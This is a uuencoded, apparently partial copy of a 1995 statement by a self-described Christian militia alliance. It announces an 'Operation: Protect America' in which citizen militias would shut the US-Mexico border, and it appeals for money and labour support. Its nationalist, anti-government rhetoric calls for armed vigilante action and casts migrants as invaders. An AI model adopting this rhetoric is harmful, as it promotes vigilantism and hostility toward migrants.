M<R!O9B!!<FEZ;VYA+"`@3F5W("!-97AI8V\@(&%N9"`@5&5X87,@('=I;&P-
M"B`@("`@("`@("`@("`@("`@<')O=FED92!A('!R;W!O<G1I;VYA;"!S=')E
M;F=T:"!O9B!C:71I>F5N(&UI;&ET:6$@;65M8F5R<R`@*&%S("!D969I;F5D
M("!I;@T*("`@("`@("`@("`@("`@("!4251,12`Q(#`@55-#(&%N9"!I;B!T
M:&5I<B!R97-P96-T:79E("!S=&%T92`@8V]D97,I("!O<B`@87,@(&UA;GD@
M(&UO<F4@(&%S#0H@("`@("`@("`@("`@("`@(&YE8V5S<V%R>2!I;B!O<F1E
M<B!T;R!G970@=&AE(&IO8B!D;VYE;`T*#0H@("`@("`@("`@("`@("`@($QA
M9&EE<R!A;F0@1V5N=&QE;65N(&]F('1H92!P<F5S<RP@86YD("!A;&P@(&]T
M:&5R("!S;W9E<F5I9VX@(&-I=&EZ96YS+"`@=V4-"B`@("`@("`@("`@("`@
M("`@=V%N="!Y;W4@=&\@=6YD97)S=&%N9"!T:&ES(&ES(&YO="!C=7(@9FER
M<W0@8VAO:6-E(&]F(&%C=&EO;BX-"@T*("`@("`@("`@("`@("`@("!792!H
M879E('-O=F5R96EG;B!B;W)D97)S+B`@5VAE;B!T:&]S92!S;W9E<F5I9VX@
M8F]R9&5R<R!A<F4@8W)O<W-E9"P-"@T*#"`@("`@("`@("`@("`@("`@("`@
M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@1G)O;3H@1&5A
M;B!#;VUP=&]N("`@("`@("`@("`@("`@("`@("`@("`@("`@.2\R.2\Y-2`@
M,38Z,#<Z,3(@(%!A9V4@-R!O9B`Q,@T*3D%424].04P@04Q,24%.0T4@3T8@
M0TA225-424%.($U)3$E424$-"@T*#0H-"@T*#0H-"@T*("`@("`@("`@("`@
M("`@(&EL;&5G86QL>2P@:70@:7,@8V%L;&5D($EL;&5G86P@26UM:6=R871I
M;VXN("!)="!I<R!A(")C<FEM:6YA;"!A8W0B(&%N9"!I=`T*("`@("`@("`@
M("`@("`@(&AA<'!E;G,@979E<GD@<VEN9VQE(&1A>2!O9B!E=F5R>2!S:6YG
M;&4@>65A<BX-"@T*("`@("`@("`@("`@("`@(%=E(&AE87(@=&AE(&9E9&5R
M86P@9V]V97)N;65N="!T96QL('5S(&ET(&ES(&1O:6YG(&%L;"!T:&%T(&ET
M(&-A;B!T;PT*("`@("`@("`@("`@("`@('!R979E;G0@=&AE<V4@:6QL96=A
M;"!C<F]S<VEN9W,@;V8@8W5R('-O=F5R96EG;B!B;W)D97)S+B`@3&%D:65S
M(&%N9`T*("`@("`@("`@("`@("`@($=E;G1L96UE;BP@5V4@87)E(&AE<F4@
M=&]D87D@=&\@=&5L;"!Y;W4@=V4@:&%V92!D:69F:6-U;'1Y(&)E;&EE=FEN
M9R!T:&%T#0H@("`@("`@("`@("`@("`@=&AE(&UO<W0@<&]W97)F=6P@8V]U
M;G1R>2!O;B!E87)T:"P@=&AE(&]N92!T:&%T(&QA;F1E9"!A(&UA;B!O;B!T
M:&4-"B`@("`@("`@("`@("`@("!M;V]N("XN+B!T:&4@;VYE('1H870@8V%N
M('-E;F0@<V%T96QL:71E<R!I;G1O(&]R8FET(&%R;W5N9"!T:&4@<&QA;F5T
M('=I=&@-"B`@("`@("`@("`@("`@("!C87!A8FEL:71I97,@;V8@<&5E<FEN
M9R!B86-K('1O('1H92!S=7)F86-E('=I=&@@=&5C:&YO;&]G>2!S=69F:6-I
M96YT;'D-"B`@("`@("`@("`@("`@("!A9'9A;F-E9"!T;R!D96-I9&4@:68@
M<VAO96QA8V5S(&%R92!T:65D(&)Y(&$@;&5F="!H86YD960@;W(@<FEG:'0@
M:&%N9&5D#0H@("`@("`@("`@("`@("`@<&5R<V]N("XN+B!T:&4@;VYE(&-A
M<&%B;&4@;V8@8V]M<&QE=&5L>2!A;FYI:&EL871I;F<@=VAO;&4@8VET:65S
M(&%N9`T*("`@("`@("`@("`@("`@(&-O=6YT<FEE<R!W:71H('1H92!P=7-H
M(&]F(&$@8G5T=&]N("XN+B!T:&%T('1H:7,@;6]S="!P;W=E<F9U;"!C;W5N
M=')Y(&-A;@T*("`@("`@("`@("`@("`@(&YO="!S=&]P('1H92!F;&]W(&]F
M(&1R=6=S(&%N9"!I;&QE9V%L('!E<G-O;G,@9G)O;2!C<F]S<VEN9R!C=7(@
M<V]V97)E:6=N#0H@("`@("`@("`@("`@("`@8F]R9&5R<R!I<R!D:69F:6-U
M;'0@=&\@8F5L:65V97(-"@T*("`@("`@("`@("`@("`@(%=%(%1(12!014]0
M3$4@87)E('!R97!A<F5D('1O('-T86YD(&%T('1H:7,@=&EM92X@(%=E(&1O
M(&YO="!I;G1E;F0@=&\@<VET#0H@("`@("`@("`@("`@("`@:61L>2!B>2!W
M:&EL92!T:&]S92!T:&%T('=O=6QD(&1E<W1R;WD@=&AI<R!C;W5N=')Y("AB
M>2!M96%N<R!O9@T*("`@("`@("`@("`@("`@('1R869F:6-K:6YG(&EN(&1R
M=6=S*2!C;VYT:6YU92!T;R!I;G9A9&4@=7,N#0H-"B`@("`@("`@("`@("`@
M("!,861I97,@86YD($=E;G1L96UE;BP@1F5L;&]W($-O=6YT<GEM96XL(%=E
M(&YO=R!I;G1R;V1U8V4@=&\@>6]U("T-"B`@("`@("`@("`@("`@("`B3W!E
M<F%T:6]N.B!0<F]T96-T($%M97)I8V$B+BXN#0H-"B`@("`@("`@("`@("`@
M("`@("`@270@:7,@=&AE(&EN=&5N=&EO;B!O9B!712!42$4@4$5/4$Q%(&]F
M('1H97-E(%5N:71E9"!3=&%T97,L(&]N#0H@("`@("`@("`@("`@("`@("`@
M($9E8G)U87)Y(#`Q+"`Q.3DV+"!T;R!E;&5C=&EV96QY(&%N9"!P97)M86YE
M;G1L>2!S:'5T('1H92!S;W5T:&5R;@T*("`@("`@("`@("`@("`@("`@("!S
M;W9E<F5I9VX@8F]R9&5R(&]F('1H92!5;FET960@4W1A=&5S('1O($%,3"`B
M24Q,14=!3"!%3E1262(@;V8@86YY#0H@("`@("`@("`@("`@("`@("`@(&ET
M96US(&]R('!E<G-O;G,N#0H-"B`@("`@("`@("`@("`@("`@("`@5T4@5$A%
M(%!%3U!,12P@=&AE(%5N;W)G86YI>F5D($UI;&ET:6$@*&%S(&1E9FEN960@
M8GD@;&%W("T@06UE;F1M96YT#0H@("`@("`@("`@("`@("`@("`@(#(@;V8@
M=&AE(%53($-O;G-T:71U=&EO;BP@5$E43$4@,2`P(%530R!396-T:6]N(#,Q
M(#$L(&%N9"!T:&4@0V%L:69O<FYI80T*("`@("`@("`@("`@("`@("`@("!-
M:6QI=&%R>2!A;F0@5F5T97)A;G,@0V]D92!396-T:6]N<R`Q,C`@=&AR;W5G
M:"`Q,C(I(&%R92!P<F5P87)E9"!T;PT*("`@("`@("`@("`@("`@("`@("!A
M8V-O;7!L:7-H('1H:7,@86-T:6]N+"!I;B!T:&4@979E;G0@8W5R(&=O=F5R
M;FUE;G0@96UP;&]Y965S(&1O(&YO=`T*("`@("`@("`@("`@("`@("`@("!S
M964@9FET('1O(&-A<G)Y(&]U="!T:&5I<B!D=71I97,@=6YD97(@=&AE($-O
M;G-T:71U=&EO;B!O9B!T:&ES(%5N:6]N#0H@("`@("`@("`@("`@("`@("`@
M(&%N9"!T:&4@9'5E('!R;V-E<W,@;V8@4&]P=6QA<B!6;W1E+"!A<R!E=FED
M96YC960@8GD@4')O<&]S:71I;VX@,3@W#0H@("`@("`@("`@("`@("`@("`@
M(')E8V5N=&QY(&5N86-T960@=VET:&EN('1H92!S=&%T92!297!U8FQI8R!O
M9B!#86QI9F]R;FEA+@T*#0H@("`@("`@("`@("`@("`@5V4@87)E(&%S:VEN
M9R!A;'-O+"!T:&%T('1H92!-97AI8V%N(&=O=F5R;FUE;G0@<&%R=&EC:7!A
M=&4@:6X@<VAU='1I;F<-"B`@("`@("`@("`@("`@("!T:&5I<B!3;W9E<F5I
M9VX@0F]R9&5R('1O($%,3"`B24Q,14=!3"!%6$E4(B!O9B!A;GD@:71E;7,@
M;W(@<&5R<V]N<R!F<F]M#0H@("`@("`@("`@("`@("`@=&AE:7(@8V]U;G1R
M>2!I;G1O('1H97-E(%5N:71E9"!3=&%T97,N#0H-"B`@("`@("`@("`@("`@
M("!4:&4@4')E<VED96YT(&AA<R!R96-E;G1L>2!S=&%T960@:&4@=VEL;"`G
M87!P<F]P<FEA=&4G(&%N(&%D9&ET:6]N86P-"B`@("`@("`@("`@("`@("!"
M:6QL:6]N(&]R('-O(&1O;&QA<G,@*&-U<B!D;VQL87)S*2!T;R!S;&]W(&1O
M=VX@=&AE(&9L;W<@;V8@:6QL96=A;"!I=&5M<PT*("`@("`@("`@("`@("`@
M(&%N9"!P97)S;VYS(&EN=&\@=&AI<R!C;W5N=')Y+@T*#0H@("`@("`@("`@
M("`@("`@4W!E;F1I;F<@;V8@861D:71I;VYA;"!T87@@9&]L;&%R<R!T;R!M
M97)E;'D@<VQO=R!D;W=N('1H92!F;&]W(&ES#0H@("`@("`@("`@("`@("`@
M54Y!0T-%4%1!0DQ%('1O('1H92!S;W9E<F5I9VX@8VET:7IE;G,@;V8@=&AE
M('-T871E(%)E<'5B;&EC(&]F($-A;&EF;W)N:6$-"B`@("`@("`@("`@("`@
M("!A;F0@=&AE(&]T:&5R(')E<'5B;&EC<R!A;&]N9R!T:&4@<V]U=&AE<FX@
M8F]R9&5R+@T*#0H@("`@("`@("`@("`@("`@5T4@5$A%(%!%3U!,12!H879E
M('1H92!C87!A8FEL:71I97,@=&\@<W1O<"`M+2!N;W0@<VEM<&QY('-L;W<@
M9&]W;B`M+2!35$]0#0H@("`@("`@("`@("`@("`@0T]-4$Q%5$5,62!T:&4@
M9FQO=R!O9B!I;&QE9V%L(&1R=6=S(&%N9"!I;&QE9V%L(&EM;6EG<F%T:6]N
M(&EN=&\@=&AE<V4-"B`@("`@("`@("`@("`@("!5;FET960@4W1A=&5S('1H
M<F]U9V@@=&AE('-O=71H97)N(&)O<F1E<B$@4&5R;6%N96YT;'DA($%N9"!W
M92!I;G1E;F0@:70-"B`@("`@("`@("`@("`@("!T;R!B92!D;VYE+@T*#0H@
M("`@("`@("`@("`@("`@5V4@87)E(&AE<F4@=&\@9F]R;6%L;'D@;V9F97(@
M8W5R(&%S<VES=&%N8V4@+2T@=&AR;W5G:"!C=7(@8V]M;6ET;65N="!T;PT*
M#0H,("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("`@("`@("!&<F]M.B!$96%N($-O;7!T;VX@("`@("`@("`@("`@
M("`@("`@("`@("`@("`Y+S(Y+SDU("`Q-CHP-SHU-"`@4&%G92`X(&]F(#$R
M#0I.051)3TY!3"!!3$Q)04Y#12!/1B!#2%))4U1)04X@34E,251)00T*#0H-
M"@T*#0H-"@T*#0H@("`@("`@("`@("`@("`@5T4@5$A%(%!%3U!,12!O9B!T
M:&5S92!5;FET960@(%-T871E<R`@86YD("!E86-H("!O9B`@=&AE("!S979E
M<F%L("!S;W9E<F5I9VX-"B`@("`@("`@("`@("`@("!S=&%T92!297!U8FQI
M8W,N#0H-"B`@("`@("`@("`@("`@("!712!42$4@4$5/4$Q%('=I;&P@87-S
M:7-T(&QA=R!E;F9O<F-E;65N="!O9F9I8VEA;',L("!U;F1E<B`@=&AE:7(@
M(&1I<F5C=&EO;@T*("`@("`@("`@("`@("`@(&%N9"!C;VUM86YD;R!W:71H
M('1H92!S;VQE(&EN=&5N=&EO;B!O9B!S:'5T=&EN9R!T:&4@8F]R9&5R(&)E
M='=E96X@=&AE#0H@("`@("`@("`@("`@("`@56YI=&5D(%-T871E<R!A;F0@
M365X:6-O('1O($%,3"!)3$Q%1T%,($-23U-324Y'4TD-"@T*("`@("`@("`@
M("`@("`@($%S:R!,87<@16YF;W)C96UE;G0[('1H97D@=VEL;"!T96QL('EO
M=2!T:&5Y(&%R92!F:6=H=&EN9R!A(&YE=F5R(&5N9&EN9PT*("`@("`@("`@
M("`@("`@(&)A='1L92!A9V%I;G-T('1H:7,@:6YV87-I;VXN("!712!42$4@
M4$5/4$Q%(&1O(&YO="!I;G1E;F0@=&\@86QL;W<@86YO=&AE<@T*("`@("`@
M("`@("`@("`@(&QO<W0@8F%T=&QE(&9O<B!T:&ES(&-O=6YT<GDN#0H-"B`@
M("`@("`@("`@("`@("!,861I97,@86YD($=E;G1L96UE;BP@1F5L;&]W($-O
M=6YT<GEM96XL('1H97)E(&%R92!T;V\@;6%N>2!L:79E<R!A="!S=&%K90T*
M("`@("`@("`@("`@("`@(&EN('1H:7,@8F%T=&QE('1O(&%L;&]W(&%N;W1H
M97(@;&]S<RX-"@T*("`@("`@("`@("`@("`@(%!O;&ET:6-I86YS('=I;&P@
M<&]N9&5R('1H:7,@<')O8FQE;2!F;W(@86YO=&AE<B`R,"!Y96%R<R!W:&EL
M92!C=7(@<V]N<PT*("`@("`@("`@("`@("`@(&%N9"!D875G:'1E<G,@9&EE
M(&]N('1H92!S=')E971S+"!O<B!D:64@:6X@=&AE:7(@<V]U;',L(&%N9"!H
M879E('1H96ER#0H@("`@("`@("`@("`@("`@9G5T=7)E<R!D97-T<F]Y960@
M8GD@=&AE(&5V:6QS(&]F(&1R=6=S(&%N9"!T:&4@;F5V97(@96YD:6YG(&9L
M;W<@;V8@=&%X#0H@("`@("`@("`@("`@("`@9&]L;&%R<R`H1$5"5"!!1T%)
M3E-4(%1(14E2($955%5215,I('=H:6-H(&ES(&-H86YN96QE9"!I;G1O('1H
M92!F961E<F%L#0H@("`@("`@("`@("`@("`@8V]F9F5R<RX-"@T*("`@("`@
M("`@("`@("`@(%1H92!S;W5T:&5R;B!54R]-15A)0T\@8F]R9&5R("!I<R`@
M87!P<F]X:6UA=&5L>2`@,38P,"`@;6EL97,@(&QO;F<N("!/;FQY("!A#0H@
M("`@("`@("`@("`@("`@=F5R>2!S;6%L;"!P97)C96YT86=E(&]F('1H870@
M;6EL86=E(&ES(&9E;F-E9"X-"@T*("`@("`@("`@("`@("`@(%=H96YE=F5R
M('1H92!L:6UI=&5D($)O<F1E<B!0871R;VPO3&%W($5N9F]R8V5M96YT('!E
M<G-O;FYE;"!M;W9E('1O(&$@:&]T#0H@("`@("`@("`@("`@("`@<W!O="P@
M=&AE(&-R:6UI;F%L<R!M;W9E('1O(&%N('5N<')O=&5C=&5D(&%R96$@;V8@
M=&AE(&)O<F1E<BX-"@T*("`@("`@("`@("`@("`@(%1H92!C<FEM:6YA;',@
M:VYO=R!W:&%T(&ES(&=O:6YG(&]N+"!T:&4@0F]R9&5R(%!A=')O;"!K;F]W
M<R`@=VAA="`@:7,@(&=O:6YG#0H@("`@("`@("`@("`@("`@;VXN($ET('-E
M96US('1H92!O;FQY('!E;W!L92!T:&%T(&1O(&YO="!K;F]W('=H870@:7,@
M9V]I;F<@;VX@:7,@8W5R#0H@("`@("`@("`@("`@("`@9V]V97)N;65N="!E
M;7!L;WEE97,N("!"=70L('1H97D@<VAO=6QD(&MN;W<L("AA;F0@:68@>6]U
M(&QO;VL@8VQO<V5L>2D-"B`@("`@("`@("`@("`@("!T:&5Y(&1O(&MN;W<N
M#0H-"B`@("`@("`@("`@("`@("!!9G1E<B!A;&PL('1H92!'04\@<F5P;W)T
M('1H870@:7,@<')E<V5N=&5D(&AE<F4@=&\@>6]U('1O9&%Y(&ES('1H92!E
M>&%C=`T*("`@("`@("`@("`@("`@(')E<&]R="!P<F5S96YT960@=&\@0V]N
M9W)E<W,@:6X@1&5C96UB97(@;V8@;&%S="!Y96%R+@T*#0H@("`@("`@("`@
M("`@("`@270@:7,@;V)V:6]U<R!E=F5N('1O('1H92!C87-U86P@;V)S97)V
M97(@=&AA="!T:&ES(&]P97)A=&EO;B!W:6QL('!R97-E;G0-"B`@("`@("`@
M("`@("`@("!A(&QO9VES=&EC<R!P<F]B;&5M+B`@270@:7,@8W5R(&AO<&4L
M(&%N9"!C=7(@<')A>65R+"!T:&%T(&%L;"!P871R:6]T:6,-"B`@("`@("`@
M("`@("`@("!!;65R:6-A;G,L(&)E('1H97D@8G5S:6YE<W-E<R!O<B!S:6UP
M;'D@2F]H;B!$;V4@;VX@=&AE(&%S<V5M8FQY(&QI;F4L('=I;&P-"B`@("`@
M("`@("`@("`@("!J;VEN(&EN('1H:7,@969F;W)T('=I=&@@=7,L('1O(&1E
M9F5N9"!C=7(@8VAI;&1R96X@86YD(&YE:6=H8F]R<RP@8W5R#0H@("`@("`@
M("`@("`@("`@:&]M97,@86YD(&-U<B!C;W5N=')Y+@T*#0H@("`@("`@("`@
M("`@("`@26X@;W)D97(@=&\@<'5T('1H;W5S86YD<R!O9B!P96]P;&4@=&]G
M971H97(@:6X@=&AE(&YU;65R;W5S("!P;W-I=&EO;G,@('1H870-"B`@("`@
M("`@("`@("`@("!S=6-H(&%N(&]P97)A=&EO;B!E;G1A:6QS("TM(&)E('1H
M97D@9G)O;G0@;&EN92!F;W)C97,L('-U<'!L>2!C;&5R:W,L#0H@("`@("`@
M("`@("`@("`@;65D:6-S+"!C;V]K<RP@;65C:&%N:6-S+"!T<G5C:R!D<FEV
M97)S+"!A;F0@;VX@86YD(&]N("TM('=I;&P@<F5Q=6ER90T*("`@("`@("`@
M("`@("`@(&-O;6UI=&UE;G0@9G)O;2!A;&P@;V8@=7,@=&\@9&5F96YD(&-U
M<B!C;W5N=')Y+@T*#0H@("`@("`@("`@("`@("`@5V4@9&\@;F]T(&MN;W<@
M:68@=&AE<F4@87)E(&%N>2!L87)G92!P871R:6]T:6,@8V]R<&]R871I;VYS
M(&QE9G0@:6X-"B`@("`@("`@("`@("`@("!!;65R:6-A+B`@5V4@87)E(&%S
M:VEN9R!F;W(@=&AE:7(@9FEN86YC:6%L('-U<'!O<G0N("!097)H87!S('1H
M97D@:&%V92!A;&P-"B`@("`@("`@("`@("`@("!G:79E;B!I;B!T;R!T:&4@
M=&5M<'1A=&EO;B!O9B!C:&5A<"!F;W)E:6=N(&QA8F]R+B`@0G5T+"!W92!W
M:6QL(&9I;F0@;W5T+@T*#0H@("`@("`@("`@("`@("`@5V4@87)E(&%L<V\@
M87-K:6YG(&QA8F]R("AB;W1H(&EN9&EV:61U86P@86YD('5N:6]N*2!F;W(@
M=&AE:7(@<W5P<&]R="X-"@T*("`@("`@("`@("`@("`@($]N92!T:&EN9R!M
M=7-T(&)E('-A:60@86)O=F4@86QL(&5L<V4@5T4@5$A%(%!%3U!,12!W:6QL
M(&YO="!T;VQE<F%T90T*("`@("`@("`@("`@("`@(&)E8V]M:6YG(&$G=&AI
M<F0@=V]R;&0G(&-O=6YT<GD@:6X@82`B3F5W(%=O<FQD($]R9&5R(BX@($D@
M<V%Y('1H:7,@=&\@04Q,#0H-"@P@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@($9R;VTZ($1E
M86X@0V]M<'1O;B`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`Y+S(Y
M+SDU("`Q-CHP.#HS,B`@4&%G92`Y(&]F(#$R#0I.051)3TY!3"!!3$Q)04Y#
M12!/1B!#2%))4U1)04X@34E,251)00T*#0H-"@T*#0H-"@T*#0H@("`@("`@
M("`@("`@("`@("`@=&AO<V4@8VET:7IE;G,@=VAO(&MN;W<@=&AE:7(@:&5R
M:71A9V4@86YD(')E9G5S92!T;R`@;&5T("!I="`@<&%S<R`@:6YT;R`@=&AE
M#0H@("`@("`@("`@("`@("`@("`@86YN=6QS(&]F(&AI<W1O<GDN#0H-"B`@
M("`@("`@("`@("`@("`@("!4:&5R92!W87,@82!T:6UE('=H96X@1V]D('-H
M960@:&ES(&UA;GD@8FQE<W-I;F=S(&%N9"!M97)C>2!U<&]N('1H:7,@9W)E
M870-"B`@("`@("`@("`@("`@("`@("!C;W5N=')Y+B`@2&4@(&)L97-S960@
M(&ET("!B96-A=7-E("!T:&4@('!E;W!L92`@=V5R92`@9&5C96YT("!A;F0@
M(&AO;F5S="P-"B`@("`@("`@("`@("`@("`@("!H87)D=V]R:VEN9RP@86YD
M($=O9"!F96%R:6YG+B`@5VAE;B!T:&4@8VAI<',@=V5R92!D;W=N+"!T:&5Y
M('=E<F4@=VEL;&EN9PT*("`@("`@("`@("`@("`@("`@('1O('-T86YD(&9O
M<B!W:&%T(&ES(')I9VAT+B`@3F]T(&9O<B!M;VYE>2!O<B!P;W=E<B!O<B`@
M9VQO<GDL("!B=70L("!F;W(@('=H870-"B`@("`@("`@("`@("`@("`@("!W
M87,@86YD('-T:6QL(&ES(')I9VAT;`T*#0H@("`@("`@("`@("`@("`@("`@
M3&%D:65S(&%N9"!'96YT;&5M96XL($9E;&QO=R!#;W5N=')Y;65N+"!W92!S
M=&%N9"!B969O<F4@>6]U(&AE<F4@;F]T(&%S#0H@("`@("`@("`@("`@("`@
M("`@9W)E870@9V5N97)A;',@;W(@9W)E870@;&5A9&5R<RP@8G5T+"!S:6UP
M;'D@87,@5T4@5$A%(%!%3U!,12X@(%=E(&%R92!T:&4-"B`@("`@("`@("`@
M("`@("`@("!S86UE('!E;W!L92!W:&\@:&%V92!B965N(&]V97)B=7)D96YE
M9"!W:71H('1A>&5S("AS<&5N="!O;B`G9G)I=F]L;W5S)PT*("`@("`@("`@
M("`@("`@("`@(&UA='1E<G,I(&IU<W0@87,@>6]U(&AA=F4@8F5E;BP@=&AE
M('-A;64@<&5O<&QE('=H;R!H879E(&)E96X@<FED:6-U;&5D#0H@("`@("`@
M("`@("`@("`@("`@86YD(&UO8VME9"!B>2!T:&]S92!I;B!T:&4@=V]R;&0@
M=&AA="!A<F4@:F5A;&]U<R!O9B!T:&4@8FQE<W-I;F=S($=O9"!H87,-"B`@
M("`@("`@("`@("`@("`@("!G<F%N=&5D('5S(&)Y($AI<R!-97)C>2P@:G5S
M="!A<R!Y;W4@:&%V92!B965N+"!W92!A<F4@=&AE('-A;64@<&5O<&QE('=H
M;PT*("`@("`@("`@("`@("`@("`@(&1I960@:6X@=&AE(%)E=F]L=71I;VX@
M+2T@=&AE(%=A<B!O9B`Q.#$R+"!T:&4@0VEV:6P@5V%R+"!75TDL(%=724DL
M($MO<F5A+`T*("`@("`@("`@("`@("`@("`@(%9I970@3F%M+"!A;F0@=&AE
M($=U;&8@5V%R+@T*#0H@("`@("`@("`@("`@("`@("`@5V4@87)E(&YO="!D
M:69F97)E;G0@9G)O;2!Y;W4@+BXN('=E($%212!93U4A(%=%(%1(12!014]0
M3$4A#0H-"B`@("`@("`@("`@("`@("`@("!4;R!B92!P97)F96-T;'D@:&]N
M97-T+"`@=&AE("!P<F]B;&5M<R`@9F%C:6YG("!U<R`@=&]D87D@(&%R92`@
M3D]4("!S:6UP;'D@(&$-"B`@("`@("`@("`@("`@("`@("!R97-U;'0@;V8@
M<&]L:71I8VEA;G,N("!4:&%T)W,@=&]O(&5A<WD@;V8@86X@86YS=V5R+"!I
M="=S("!T;V\@(&UU8V@@(&]F("!A#0H@("`@("`@("`@("`@("`@("`@8V]P
M+6]U="X-"@T*("`@("`@("`@("`@("`@("`@(%1H97-E('!R;V)L96US(&9A
M8VEN9R!U<R!A<F4@9'5E('1O($]54B!E<G)O<G,@+2T@5T4@5$A%(%!%3U!,
M12X@($)Y#0H@("`@("`@("`@("`@("`@("`@86QL;W=I;F<@=&AE('!O;&ET
M:6-I86YS('1O('-H:7)K('1H96ER("!C;VYS=&ET=71I;VYA;"`@<F5S<&]N
M<VEB:6QI=&EE<R`@86YD#0H@("`@("`@("`@("`@("`@("`@9'5T:65S("TM
M(&%N9"!A;&QO=VEN9R!T:&5M('1O("!S=&5P("!B97EO;F0@('1H96ER("!C
M;VYS=&ET=71I;VYA;"`@875T:&]R:71Y#0H@("`@("`@("`@("`@("`@("`@
M+2T@=V4@:&%V92!S:&ER:V5D($]54B!R97-P;VYS:6)I;&ET:65S(&%N9"!D
M=71I97,N#0H-"B`@("`@("`@("`@("`@("`@("!997,N+BX@=V4@:&%V92!A
M;&QO=V5D(&ET+B`@0G5T+"!I="!I<R!T:6UE(&ET(&)E('-T;W!P960N#0H-
M"B`@("`@("`@("`@("`@("`@("!,861I97,@86YD($=E;G1L96UE;BP@1F5L
M;&]W($-O=6YT<GEM96XL(&ET(&ES(&YO=R!T:6UE('1O(%!55"!54"!O<B!3
M2%54#0H@("`@("`@("`@("`@("`@("`@55!)#0H-"B`@("`@("`@("`@("`@
M("`@("!792!C86X@86QL(&%G<F5E('1H870@=VAE;B`@<&5O<&QE("!E;G1E
M<B`@=&AI<R`@8V]U;G1R>2`@:70@('-H;W5L9"`@8F4@(&1O;F4-"B`@("`@
M("`@("`@("`@("`@("!,05=&54Q,62X@(%=E("!C86X@(&%L;"`@86=R964@
M('1H870@('1H;W-E("!W:&\@("!W;W5L9"`@(&)R:6YG("`@9&5A=&@@("!A
M;F0-"B`@("`@("`@("`@("`@("`@("!D97-T<G5C=&EO;B!T;R!C=7(@;&%N
M9"!F<F]M(&9O<F5I9VX@;&%N9',@;75S="!B92!S=&]P<&5D+@T*#0H@("`@
M("`@("`@("`@("`@("`@270@:7,@=&EM92!T;R!S=&%N9"X@($EF('=E(&1O
M(&YO="!S=&%N9"!N;W<L("!W92`@=VEL;"`@8F4@('-U8FIE8W1E9"`@=&\@
M('1H90T*("`@("`@("`@("`@("`@("`@('1Y<F%N;GD@;V8@9F5A<B!F;W(@
M979E<BX@($9E87(@;V8@8W)I;64N("!&96%R(&]F(&1E871H+B`@1F5A<B!O
M9B!T:&4-"B`@("`@("`@("`@("`@("`@("!G;W9E<FYM96YT('1H870@:7,@
M<W=O<FX@=&\@<')O=&5C="!U<RP@8G5T(&-H;V]S97,@;F]T('1O+B`@1F5A
M<B!F;W(@8W5R#0H@("`@("`@("`@("`@("`@("`@8VAI;&1R96YS)R!F=71U
M<F5S+B`@1F5A<B!O9B!C=7(@1T]$)W,@=W)A=&AL#0H-"B`@("`@("`@("`@
M("`@("`@("!)<R!I="!W;W)T:"!H:61I;F<@9G)O;2!T:&4@=')U=&@@+BXN
M(&]R(&%R92!Y;W4@(')E861Y("!T;R`@8F4@(&%N("!!;65R:6-A;C\-"B`@
M("`@("`@("`@("`@("`@("!7:6QL('EO=2!L:79E(&EN(&9E87(_($]R('=I
M;&P@>6]U(&QI=F4@:6X@=&AE(&QI9VAT(&]F(&QI8F5R='D@=&AA="`@8V]M
M97,-"B`@("`@("`@("`@("`@("`@("!F<F]M('-T86YD:6YG('5P(&9O<B!W
M:&%T(&ES(')I9VAT("TM(&%N9"!F:71T:6YG(&EN('1H92!S:6=H="!O9B!'
M3T1)#0H-"B`@("`@("`@("`@("`@("`@("!);B!C;&]S:6YG+"!L970@=7,@
M<&]N9&5R('1H:7,@<75O=&4@9G)O;2!386UU96P@061A;7,@*#$@-S<U*2!L
M;VYG(&AI9&1E;@T*("`@("`@("`@("`@("`@("`@(&EN('1H92!D=7-T(&]F
M('1H92!A<F-H:79E<R!O9B!C=7(@:&5R:71A9V4N("!)="!I<R!F:71T:6YG
M(&%N9"`@<')O<&5R+B`@270-"B`@("`@("`@("`@("`@("`@("!I<R!N96-E
M<W-A<GD@+2T@9F]R('5S+"!712!42$4@4$5/4$Q%("TM('1O('5N9&5R<W1A
M;F0@=VAA="!I<R!H86YG:6YG(&EN#0H@("`@("`@("`@("`@("`@("`@=&AE
M(&)A;&%N8V4-"@T*#"`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("`@("`@("`@("`@("`@("`@("`@1G)O;3H@1&5A;B!#;VUP=&]N
M("`@("`@("`@("`@("`@("`@("`@("`@("`@(#DO,CDO.34@(#$V.C`Y.B`Q
M(#`@(%!A9V4@,2`P(&]F(#$R#0I.051)3TY!3"!!3$Q)04Y#12!/1B!#2%))
M4U1)04X@34E,251)00T*#0H-"@T*#0H-"@T*#0H@("`@("`@("`@("`@("`@
M("`@("`@(DE&(%E%($Q/5D4@5T5!3%1(($)%5"U&15(@5$A!3B!,24)%4E19
M+"!42$4@5%)!3E%524Q)5%D@3T8@4T525DE4541%#0H@("`@("`@("`@("`@
M("`@("`@("`@0D54+49%4B!42$%.(%1(12!!3DE-051)3D<@0T].5$535"!/
M1B!&4D5%1$]-+"!'3R!(3TU%($923TT@55,@24X-"B`@("`@("`@("`@("`@
M("`@("`@("!014%#12X@(%=%($%32R!.3U0@64]54B!#3U5.4T5,4R!/4B!9
M3U52($%235,N("!#4D]50T@@1$]73B!!3D0@3$E#2PT*("`@("`@("`@("`@
M("`@("`@("`@(%1(12!(04Y$4R!42$%4($9%140@64]5+B`@34%9(%E/55(@
M0TA!24Y3(%-%5"!,24=(5$Q9(%503TX@64]5($%.1"!-05D-"B`@("`@("`@
M("`@("`@("`@("`@("!03U-415))5%D@("`@($9/4D=%5"`@("`@5$A!5"`@
M("`@644@("`@(%=%4D4@("`@($]54B`@("`@0T]53E1264U%3BXB#0H-"@T*
M("`@("`@("`@("`@("`@("`@3F]W+"!)('=O=6QD(&QI:V4@=&\@=&%K92!T
M:&ES(&]P<&]R='5N:71Y('1O(&%D9')E<W,@82!F97<@(&]F("!T:&4@(&UO
M<F4-"B`@("`@("`@("`@("`@("`@(&-O;6UO;B!Q=65S=&EO;G,@=&AA="!W
M92!A;G1I8VEP871E('EO=2!W:6QL(&AA=F4@<F5G87)D:6YG('1H:7,@;6%T
M=&5R+@T*#0H@("`@("`@("`@("`@("`@("!4:&4@9FER<W0@<75E<W1I;VX@
M=&AE;B!I<R`B5VAO(&ES('1H92!-:6QI=&EA/R(@5&AE(")M:6QI=&EA(B!I
